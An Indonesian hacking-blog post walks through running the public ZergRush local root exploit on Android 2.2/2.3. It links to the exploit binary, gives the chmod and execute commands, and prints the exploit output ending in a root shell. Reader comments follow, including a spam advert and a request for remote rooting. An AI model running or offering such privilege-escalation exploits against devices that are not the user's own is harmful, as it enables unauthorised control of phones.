Home / Hacking / Localroot Exploit Android Froyo & Gingerbread
downloads

Localroot Exploit Android Froyo & Gingerbread

Merry Christmas All BinusHacker Family,

Adakah dari kalian yang memiliki Android / Temannya memiliki Android?

BinusHacker Team ingin berbagi sekilas mengenai local root exploit untuk Froyo (2.2) dan Gingerbread (2.3). Nah untuk yang versi terbaru Honeycomb masih belum karena sudah di patch. Kebetulan di Indonesia masih banyak yang Froyo (2.2) dan Gingerbread (2.3).

Oke, yuk kita lanjutkan:

Silakan download tools untuk exploit di link berikut:
Download ZergRush Explot

Untuk informasi source & resource mengenai exploit di atas bisa dilihat disini:
Revolutionary Github Master Code

Untuk menjalankan exploit ini yang anda butuhkan adalah:
1. Siapkan ADB Shell untuk bisa menjalankan exploit ini, silakan dicari di google.
2. Anda harus mempunyai user terlebih dahulu untuk bisa melakukan eksekusi binary exploit.
3. Siapkan dan tenangkan hati anda (Jokes 🙂 )

Android Local Root Exploit

Eksekusi Exploit:
$ chmod 755 /data/local/zergRush
$ /data/local/zergRush

Hasilnya akan seperti berikut


[**] BinusHacker Modification Code - Froyo & GingerBread
[**] Zerg rush - Android 2.2/2.3 local root
[**] (C) 2011 Revolutionary. All rights reserved.

[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.

[+] Found a GingerBread ! 0x00017118[*] Sending 149 zerglings ...[*] Trying a new path ...[*] Sending 149 zerglings ...[*] Trying a new path ...[*] Sending 149 zerglings ...[*] Trying a new path ...[*] Sending 149 zerglings ...
[+] Zerglings caused crash (good news): 0x401219c4 0x0054[*] Researching Metabolic Boost ...
[+] Speedlings on the go ! 0xafd260a9 0xafd39f9f[*] Poping 24 more zerglings[*] Sending 173 zerglings ...

[+] Rush did it ! It's a GG, man !
[+] Killing ADB and restarting as root..enjoy & eat it!

Hohoho.. Jika muncul jawaban yang demikian, maka anda sudah berhasil.
Silakan melakukan connect ulang ADB Shell Anda.

# id
uid=0 gid=0

Tonton Video Berikut Untuk Lebih Jelasnya:

About BinusHacker

Check Also

hacking-ruby-programming-binushacker

Hacking dan Tuning Ruby Programming

Hacking and Tuning Ruby Programming Hacking Ruby Guidance Daftar Isi Materi Beberapa bab masih dalam …

14 comments

  1. gan ini fungsinya buat apaa ???

  2. cuma root aja gan? pake super one click selesai gan, :p

  3. hmm.. Amazing tapi saya pake cara yang lebih mudah ko hhe 😀 bahkan newbie sangat mudah menggunakannya… kalo ada yang mudah kenapa cari yang sulit.. Hacker itu cerdas kan hhe 😀

  4. FacePAD is a Powerfull social network from Indonesia. FacePAD allow you to share anything like photo, video, music, and write a blogpost, create poll, quiz, and share it to your friend in all social network.
    Now you can access FacePAD at FacePAD, Or FacePAD Mobile

  5. keren artikelnya…minta yang remote rooting donks!!!! grrrr….

  6. you.evolutions

    ada yg tw cara root xperia ray android v.2.3.4? soal’y bru d’update pke cra lama gk brhasil…

  7. untuk galaxy pro punya samsung gimana gan

  8. gan alumni binus ya

  9. gan, HP ane Samsung Galaxy Young Duos, pengen diinject bahasa Arab gmn caranya ya? Tx b4

  10. Yang kaga ngerti mending ga usah komen!!! XD

  11. Gan, gak bisa dibuka website toolsnya please h3lp!!!

  12. nice app bro!!

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *